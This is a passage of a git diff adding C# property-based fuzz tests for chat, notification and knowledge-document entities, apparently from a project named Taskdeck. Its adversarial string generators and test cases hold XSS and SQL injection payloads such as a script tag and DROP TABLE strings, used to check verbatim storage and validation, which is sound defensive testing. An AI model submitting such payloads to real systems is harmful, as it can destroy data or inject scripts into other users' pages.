+        Gen.Elements(NotificationCadence.Immediate, NotificationCadence.Digest);
+
+    // ─────────────────────── NotificationDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property NotificationDto_RoundTrip_PreservesTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(TypeGen()),
+            Arb.From(CadenceGen()),
+            (title, type, cadence) =>
+            {
+                var dto = new NotificationDto(
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    type,
+                    cadence,
+                    title,
+                    "Valid message",
+                    "Card",
+                    Guid.NewGuid(),
+                    false,
+                    null,
+                    DateTimeOffset.UtcNow,
+                    DateTimeOffset.UtcNow);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<NotificationDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Title.Should().Be(title);
+                deserialized.Type.Should().Be(type);
+                deserialized.Cadence.Should().Be(cadence);
+                deserialized.Id.Should().Be(dto.Id);
+                deserialized.IsRead.Should().BeFalse();
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property NotificationDto_RoundTrip_PreservesMessage()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            message =>
+            {
+                var dto = new NotificationDto(
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    NotificationType.System,
+                    NotificationCadence.Immediate,
+                    "Valid title",
+                    message,
+                    "Card",
+                    Guid.NewGuid(),
+                    false,
+                    null,
+                    DateTimeOffset.UtcNow,
+                    DateTimeOffset.UtcNow);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<NotificationDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Message.Should().Be(message);
+                deserialized.UserId.Should().Be(dto.UserId);
+            });
+    }
+
+    // ─────────────────────── CreateNotificationRequestDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property CreateNotificationRequestDto_RoundTrip_Identity()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(AdversarialStringGen()),
+            Arb.From(NullableStringGen()),
+            (title, message, sourceEntityType) =>
+            {
+                var dto = new CreateNotificationRequestDto(
+                    Guid.NewGuid(),
+                    NotificationType.System,
+                    title,
+                    message,
+                    Guid.NewGuid(),
+                    sourceEntityType,
+                    Guid.NewGuid(),
+                    "dedup-key");
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<CreateNotificationRequestDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Title.Should().Be(title);
+                deserialized.Message.Should().Be(message);
+                deserialized.SourceEntityType.Should().Be(sourceEntityType);
+                deserialized.UserId.Should().Be(dto.UserId);
+            });
+    }
+
+    // ─────────────────────── NotificationDto with nullable fields ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property NotificationDto_WithNullableFields_RoundTrips()
+    {
+        return Prop.ForAll(
+            Arb.From(NullableStringGen()),
+            ArbMap.Default.ArbFor<bool>(),
+            (sourceEntityType, isRead) =>
+            {
+                var readAt = isRead ? DateTimeOffset.UtcNow : (DateTimeOffset?)null;
+                var dto = new NotificationDto(
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    null, // null boardId
+                    NotificationType.System,
+                    NotificationCadence.Immediate,
+                    "Title",
+                    "Message",
+                    sourceEntityType,
+                    null, // null sourceEntityId
+                    isRead,
+                    readAt,
+                    DateTimeOffset.UtcNow,
+                    DateTimeOffset.UtcNow);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<NotificationDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.BoardId.Should().BeNull();
+                deserialized.SourceEntityType.Should().Be(sourceEntityType);
+                deserialized.SourceEntityId.Should().BeNull();
+                deserialized.IsRead.Should().Be(isRead);
+                if (isRead)
+                    deserialized.ReadAt.Should().NotBeNull();
+                else
+                    deserialized.ReadAt.Should().BeNull();
+            });
+    }
+
+    // ─────────────────────── Malformed JSON ───────────────────────
+
+    [Theory]
+    [InlineData("{}")]
+    [InlineData("{\"title\": null, \"message\": null}")]
+    [InlineData("{\"unknownField\": 42}")]
+    [InlineData("{\"type\": 999}")]
+    [InlineData("null")]
+    public void NotificationDto_MalformedJson_HandledGracefully(string json)
+    {
+        try
+        {
+            var result = JsonSerializer.Deserialize<NotificationDto>(json, JsonOptions);
+        }
+        catch (JsonException)
+        {
+            // Expected
+        }
+    }
+}

--- a/backend/tests/Taskdeck.Application.Tests/Fuzz/NotificationDtoSerializationFuzzTests.cs
+++ b/backend/tests/Taskdeck.Application.Tests/Fuzz/NotificationDtoSerializationFuzzTests.cs
@@ -24,27 +24,6 @@ public class NotificationDtoSerializationFuzzTests
         WriteIndented = false
     };
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE notifications; --"),
-        Gen.Constant("\"quoted\""),
-        Gen.Constant("back\\slash"),
-        Gen.Constant("new\nline"),
-        Gen.Constant("emoji 👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant(""),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
-    private static Gen<string?> NullableStringGen() => Gen.OneOf(
-        Gen.Constant((string?)null),
-        AdversarialStringGen().Select(s => (string?)s)
-    );
-
     private static Gen<NotificationType> TypeGen() =>
         Gen.Elements(
             NotificationType.Mention,
@@ -62,7 +41,7 @@ public class NotificationDtoSerializationFuzzTests
     public Property NotificationDto_RoundTrip_PreservesTitle()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             Arb.From(TypeGen()),
             Arb.From(CadenceGen()),
             (title, type, cadence) =>
@@ -98,7 +77,7 @@ public class NotificationDtoSerializationFuzzTests
     public Property NotificationDto_RoundTrip_PreservesMessage()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             message =>
             {
                 var dto = new NotificationDto(
@@ -131,9 +110,9 @@ public class NotificationDtoSerializationFuzzTests
     public Property CreateNotificationRequestDto_RoundTrip_Identity()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
-            Arb.From(AdversarialStringGen()),
-            Arb.From(NullableStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.NullableStringGen()),
             (title, message, sourceEntityType) =>
             {
                 var dto = new CreateNotificationRequestDto(
@@ -163,7 +142,7 @@ public class NotificationDtoSerializationFuzzTests
     public Property NotificationDto_WithNullableFields_RoundTrips()
     {
         return Prop.ForAll(
-            Arb.From(NullableStringGen()),
+            Arb.From(FuzzTestGenerators.NullableStringGen()),
             ArbMap.Default.ArbFor<bool>(),
             (sourceEntityType, isRead) =>
             {

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatMessagePropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatMessagePropertyTests.cs
@@ -1,0 +1,256 @@
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Domain.Entities;
+using Taskdeck.Domain.Exceptions;
+using Xunit;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Property-based tests for ChatMessage entity invariants.
+/// Verifies construction with adversarial content, role enumeration,
+/// message type validation, and token usage boundaries.
+/// </summary>
+public class ChatMessagePropertyTests
+{
+    private const int MaxTests = 200;
+
+    private static readonly string[] ValidMessageTypes =
+    {
+        "text", "proposal-reference", "error", "status", "degraded", "clarification"
+    };
+
+    // ─────────────────────── Generators ───────────────────────
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("\u202E"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE messages; --"),
+        Gen.Constant("👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant("\x01\x02\x03"),
+        Gen.Constant(""),
+        Gen.Constant(" "),
+        Gen.Constant((string)null!),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<string> ValidContentGen() =>
+        Gen.Choose(1, 500)
+            .SelectMany(len =>
+                Gen.ArrayOf(Gen.Elements('a', 'b', 'c', '1', '2', ' ', '.', '!'), len)
+                .Select(chars => new string(chars)))
+            .Where(s => !string.IsNullOrWhiteSpace(s));
+
+    private static Gen<ChatMessageRole> RoleGen() =>
+        Gen.Elements(ChatMessageRole.User, ChatMessageRole.Assistant, ChatMessageRole.System);
+
+    private static Gen<string> ValidMessageTypeGen() =>
+        Gen.Elements(ValidMessageTypes);
+
+    // ─────────────────────── Construction properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ValidParams_AlwaysCreatesMessage()
+    {
+        return Prop.ForAll(
+            Arb.From(ValidContentGen()),
+            Arb.From(RoleGen()),
+            Arb.From(ValidMessageTypeGen()),
+            (content, role, messageType) =>
+            {
+                var sessionId = Guid.NewGuid();
+                var msg = new ChatMessage(sessionId, role, content, messageType);
+                msg.SessionId.Should().Be(sessionId);
+                msg.Role.Should().Be(role);
+                msg.Content.Should().Be(content);
+                msg.MessageType.Should().Be(messageType);
+                msg.ProposalId.Should().BeNull();
+                msg.TokenUsage.Should().BeNull();
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptyOrWhitespaceContent_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Elements("", " ", "\t", "\n")),
+            content =>
+            {
+                var act = () => new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, content);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptySessionId_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(ValidContentGen()),
+            content =>
+            {
+                var act = () => new ChatMessage(Guid.Empty, ChatMessageRole.User, content);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    // ─────────────────────── Adversarial content handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialContent()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            content =>
+            {
+                try
+                {
+                    _ = new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, content);
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid content
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"ChatMessage constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── MessageType validation ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property InvalidMessageType_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Elements(
+                "invalid", "TEXT", "Text", "execute", "delete",
+                "<script>", "'; DROP TABLE --", "", " ")),
+            messageType =>
+            {
+                var act = () => new ChatMessage(
+                    Guid.NewGuid(), ChatMessageRole.User, "content", messageType);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    // ─────────────────────── TokenUsage boundary values ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property NegativeTokenUsage_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(-1000, -1)),
+            negUsage =>
+            {
+                var act = () => new ChatMessage(
+                    Guid.NewGuid(), ChatMessageRole.User, "content",
+                    tokenUsage: negUsage);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property NonNegativeTokenUsage_AlwaysAccepted()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(0, 100_000)),
+            usage =>
+            {
+                var msg = new ChatMessage(
+                    Guid.NewGuid(), ChatMessageRole.User, "content",
+                    tokenUsage: usage);
+                msg.TokenUsage.Should().Be(usage);
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property SetTokenUsage_NegativeAlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(-1000, -1)),
+            negUsage =>
+            {
+                var msg = new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, "content");
+                var act = () => msg.SetTokenUsage(negUsage);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    // ─────────────────────── SetProposalId boundary ───────────────────────
+
+    [Fact]
+    public void SetProposalId_EmptyGuid_Throws()
+    {
+        var msg = new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, "content");
+        var act = () => msg.SetProposalId(Guid.Empty);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property SetProposalId_NonEmptyGuid_Succeeds()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Fresh(() => Guid.NewGuid())),
+            proposalId =>
+            {
+                var msg = new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, "content");
+                msg.SetProposalId(proposalId);
+                msg.ProposalId.Should().Be(proposalId);
+            });
+    }
+
+    // ─────────────────────── Adversarial DegradedReason ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_WithAdversarialDegradedReason_NeverThrowsUnhandled()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            reason =>
+            {
+                try
+                {
+                    _ = new ChatMessage(
+                        Guid.NewGuid(), ChatMessageRole.Assistant, "content",
+                        degradedReason: reason);
+                }
+                catch (DomainException)
+                {
+                    // Expected for some inputs
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException)
+                {
+                    throw new Exception(
+                        $"ChatMessage constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── SQL injection stored verbatim ───────────────────────
+
+    [Theory]
+    [InlineData("'; DROP TABLE chat_messages; --")]
+    [InlineData("\" OR 1=1 --")]
+    public void SqlInjection_InContent_StoredAsLiteral(string content)
+    {
+        var msg = new ChatMessage(Guid.NewGuid(), ChatMessageRole.User, content);
+        msg.Content.Should().Be(content, "SQL injection strings should be stored verbatim");
+    }
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatMessagePropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatMessagePropertyTests.cs
@@ -24,23 +24,6 @@ public class ChatMessagePropertyTests
 
     // ─────────────────────── Generators ───────────────────────
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("\u202E"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE messages; --"),
-        Gen.Constant("👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant("\x01\x02\x03"),
-        Gen.Constant(""),
-        Gen.Constant(" "),
-        Gen.Constant((string)null!),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
     private static Gen<string> ValidContentGen() =>
         Gen.Choose(1, 500)
             .SelectMany(len =>
@@ -108,7 +91,7 @@ public class ChatMessagePropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialContent()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             content =>
             {
                 try
@@ -221,7 +204,7 @@ public class ChatMessagePropertyTests
     public Property Constructor_WithAdversarialDegradedReason_NeverThrowsUnhandled()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             reason =>
             {
                 try

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatSessionPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatSessionPropertyTests.cs
@@ -1,0 +1,229 @@
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Domain.Entities;
+using Taskdeck.Domain.Exceptions;
+using Xunit;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Property-based tests for ChatSession entity invariants.
+/// Verifies construction, title validation, and state machine transitions
+/// hold for all generated inputs.
+/// </summary>
+public class ChatSessionPropertyTests
+{
+    private const int MaxTests = 200;
+
+    // ─────────────────────── Generators ───────────────────────
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("\u202E"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE sessions; --"),
+        Gen.Constant("👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("\x01\x02\x03"),
+        Gen.Constant("\x1B[31m"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant(""),
+        Gen.Constant(" "),
+        Gen.Constant("\t"),
+        Gen.Constant((string)null!),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Arbitrary<string> ValidTitleArb()
+    {
+        var gen = Gen.Choose(1, 200)
+            .SelectMany(len =>
+                Gen.ArrayOf(Gen.Elements(
+                    'a', 'b', 'c', 'X', 'Y', '1', '2', ' ', '-', '_'), len)
+                .Select(chars => new string(chars)))
+            .Where(s => !string.IsNullOrWhiteSpace(s));
+        return Arb.From(gen);
+    }
+
+    // ─────────────────────── Construction properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ValidTitle_AlwaysCreatesChatSession()
+    {
+        return Prop.ForAll(
+            ValidTitleArb(),
+            title =>
+            {
+                var session = new ChatSession(Guid.NewGuid(), title);
+                session.Title.Should().Be(title);
+                session.Status.Should().Be(ChatSessionStatus.Active);
+                session.Id.Should().NotBeEmpty();
+                session.Messages.Should().BeEmpty();
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptyOrWhitespaceTitle_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Elements("", " ", "\t", "\n", "  \t\n  ")),
+            title =>
+            {
+                var act = () => new ChatSession(Guid.NewGuid(), title);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property TitleExceeding200Chars_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(201, 500).Select(len => new string('t', len))),
+            longTitle =>
+            {
+                var act = () => new ChatSession(Guid.NewGuid(), longTitle);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptyGuidUserId_AlwaysThrows()
+    {
+        return Prop.ForAll(
+            ValidTitleArb(),
+            title =>
+            {
+                var act = () => new ChatSession(Guid.Empty, title);
+                act.Should().Throw<DomainException>()
+                    .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+            });
+    }
+
+    // ─────────────────────── Adversarial title handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            title =>
+            {
+                try
+                {
+                    _ = new ChatSession(Guid.NewGuid(), title);
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid titles
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"ChatSession constructor threw unexpected {ex.GetType().Name} for title [{title?.Length ?? -1} chars]: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── UpdateTitle properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property UpdateTitle_NeverThrowsUnhandled_OnAdversarialTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            newTitle =>
+            {
+                var session = new ChatSession(Guid.NewGuid(), "OriginalTitle");
+                try
+                {
+                    session.UpdateTitle(newTitle);
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid titles
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"ChatSession.UpdateTitle threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property UpdateTitle_PreservesStatusAndMessages()
+    {
+        return Prop.ForAll(
+            ValidTitleArb(),
+            newTitle =>
+            {
+                var session = new ChatSession(Guid.NewGuid(), "OriginalTitle");
+                var originalStatus = session.Status;
+                session.UpdateTitle(newTitle);
+                session.Title.Should().Be(newTitle);
+                session.Status.Should().Be(originalStatus);
+                session.Messages.Should().BeEmpty();
+            });
+    }
+
+    // ─────────────────────── State machine properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ArchiveReactivate_CyclePreservesTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(1, 10)),
+            cycles =>
+            {
+                var session = new ChatSession(Guid.NewGuid(), "TestSession");
+                for (int i = 0; i < cycles; i++)
+                {
+                    session.Archive();
+                    session.Status.Should().Be(ChatSessionStatus.Archived);
+
+                    session.Reactivate();
+                    session.Status.Should().Be(ChatSessionStatus.Active);
+                }
+                session.Title.Should().Be("TestSession");
+            });
+    }
+
+    [Fact]
+    public void Archive_WhenAlreadyArchived_ThrowsDomainException()
+    {
+        var session = new ChatSession(Guid.NewGuid(), "Test");
+        session.Archive();
+        var act = () => session.Archive();
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.InvalidOperation);
+    }
+
+    [Fact]
+    public void Reactivate_WhenAlreadyActive_ThrowsDomainException()
+    {
+        var session = new ChatSession(Guid.NewGuid(), "Test");
+        var act = () => session.Reactivate();
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.InvalidOperation);
+    }
+
+    // ─────────────────────── SQL injection in titles stored verbatim ───────────────────────
+
+    [Theory]
+    [InlineData("'; DROP TABLE chat_sessions; --")]
+    [InlineData("\" OR 1=1 --")]
+    [InlineData("Robert'); DROP TABLE students;--")]
+    public void SqlInjection_InTitle_StoredAsLiteral(string title)
+    {
+        var session = new ChatSession(Guid.NewGuid(), title);
+        session.Title.Should().Be(title, "SQL injection strings should be stored verbatim");
+    }
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatSessionPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/ChatSessionPropertyTests.cs
@@ -19,25 +19,6 @@ public class ChatSessionPropertyTests
 
     // ─────────────────────── Generators ───────────────────────
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("\u202E"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE sessions; --"),
-        Gen.Constant("👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("\x01\x02\x03"),
-        Gen.Constant("\x1B[31m"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant(""),
-        Gen.Constant(" "),
-        Gen.Constant("\t"),
-        Gen.Constant((string)null!),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
     private static Arbitrary<string> ValidTitleArb()
     {
         var gen = Gen.Choose(1, 200)
@@ -111,7 +92,7 @@ public class ChatSessionPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             title =>
             {
                 try
@@ -137,7 +118,7 @@ public class ChatSessionPropertyTests
     public Property UpdateTitle_NeverThrowsUnhandled_OnAdversarialTitle()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             newTitle =>
             {
                 var session = new ChatSession(Guid.NewGuid(), "OriginalTitle");

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/KnowledgeDocumentPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/KnowledgeDocumentPropertyTests.cs
@@ -1,0 +1,302 @@
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Domain.Entities;
+using Taskdeck.Domain.Exceptions;
+using Xunit;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Property-based tests for KnowledgeDocument entity invariants.
+/// Verifies title/content length boundaries, sourceUrl/tags validation,
+/// archive lifecycle, and adversarial input handling.
+/// </summary>
+public class KnowledgeDocumentPropertyTests
+{
+    private const int MaxTests = 200;
+
+    // ─────────────────────── Generators ───────────────────────
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE knowledge; --"),
+        Gen.Constant("👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant(""),
+        Gen.Constant(" "),
+        Gen.Constant((string)null!),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<string> ValidTitleGen() =>
+        Gen.Choose(1, 200)
+            .SelectMany(len =>
+                Gen.ArrayOf(Gen.Elements('a', 'b', 'c', '1', '2', ' ', '-'), len)
+                .Select(chars => new string(chars)))
+            .Where(s => !string.IsNullOrWhiteSpace(s));
+
+    private static Gen<string> ValidContentGen() =>
+        Gen.Choose(1, 500)
+            .SelectMany(len =>
+                Gen.ArrayOf(Gen.Elements('a', 'b', 'c', '1', '2', ' ', '.', '\n'), len)
+                .Select(chars => new string(chars)))
+            .Where(s => !string.IsNullOrWhiteSpace(s));
+
+    // ─────────────────────── Construction properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ValidParams_AlwaysCreatesDocument()
+    {
+        return Prop.ForAll(
+            Arb.From(ValidTitleGen()),
+            Arb.From(ValidContentGen()),
+            (title, content) =>
+            {
+                var doc = new KnowledgeDocument(
+                    Guid.NewGuid(), title, content, KnowledgeSourceType.Manual);
+                doc.Title.Should().Be(title);
+                doc.Content.Should().Be(content);
+                doc.SourceType.Should().Be(KnowledgeSourceType.Manual);
+                doc.IsArchived.Should().BeFalse();
+                doc.SourceUrl.Should().BeNull();
+                doc.Tags.Should().BeNull();
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptyGuidUserId_AlwaysThrows()
+    {
+        var act = () => new KnowledgeDocument(
+            Guid.Empty, "Title", "Content", KnowledgeSourceType.Manual);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        return true.ToProperty();
+    }
+
+    // ─────────────────────── Title boundary values ───────────────────────
+
+    [Theory]
+    [InlineData(0)]
+    [InlineData(1)]
+    [InlineData(200)]
+    [InlineData(201)]
+    [InlineData(1000)]
+    public void Title_BoundaryLength_HandledCorrectly(int length)
+    {
+        var title = length == 0 ? "" : new string('t', length);
+        var act = () => new KnowledgeDocument(
+            Guid.NewGuid(), title, "Valid content", KnowledgeSourceType.Manual);
+
+        if (length == 0 || length > 200)
+        {
+            act.Should().Throw<DomainException>()
+                .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        }
+        else
+        {
+            var doc = act();
+            doc.Title.Length.Should().Be(length);
+        }
+    }
+
+    // ─────────────────────── Content boundary values ───────────────────────
+
+    [Theory]
+    [InlineData(0)]
+    [InlineData(1)]
+    [InlineData(50_000)]
+    [InlineData(50_001)]
+    public void Content_BoundaryLength_HandledCorrectly(int length)
+    {
+        var content = length == 0 ? "" : new string('c', length);
+        var act = () => new KnowledgeDocument(
+            Guid.NewGuid(), "Title", content, KnowledgeSourceType.Manual);
+
+        if (length == 0 || length > 50_000)
+        {
+            act.Should().Throw<DomainException>()
+                .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        }
+        else
+        {
+            var doc = act();
